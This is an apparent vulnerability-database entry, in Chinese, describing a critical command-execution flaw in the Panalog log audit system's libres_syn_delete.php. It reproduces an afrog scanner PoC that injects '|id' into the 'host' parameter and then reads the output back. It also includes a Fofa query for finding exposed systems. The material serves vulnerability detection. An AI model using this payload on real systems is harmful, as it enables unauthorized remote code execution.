panalog-libres-syn-delete-rce: Panalog大数据日志审计系统libres_syn_delete.php存在命令执行

日期: 2025-09-01 | 影响软件: Panalog大数据日志审计系统 | POC: 已公开

漏洞描述

Fofa: app="Panabit-Panalog"

PoC代码[已公开]

id: panalog-libres-syn-delete-rce

info:
  name: Panalog大数据日志审计系统libres_syn_delete.php存在命令执行
  author: zan8in
  severity: critical
  verified: true
  description: |-
    Fofa: app="Panabit-Panalog"
  reference:
    - https://mp.weixin.qq.com/s/oj-ehgQV_zZgVxXznSUSVw
  tags: panalog,rce
  created: 2024/02/21

set:
  filename: randomInt(2000000, 2100000)
rules:
  r0:
    request:
      method: POST
      path: /content-apply/libres_syn_delete.php
      body: token=1&id=2&host=|id >{{filename}}.txt
    expression: response.status == 200 && response.body.bcontains(b'"yn"')
  r1:
    request:
      method: GET
      path: /content-apply/{{filename}}.txt
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/panalog-libres-syn-delete-rce.yaml

相关漏洞推荐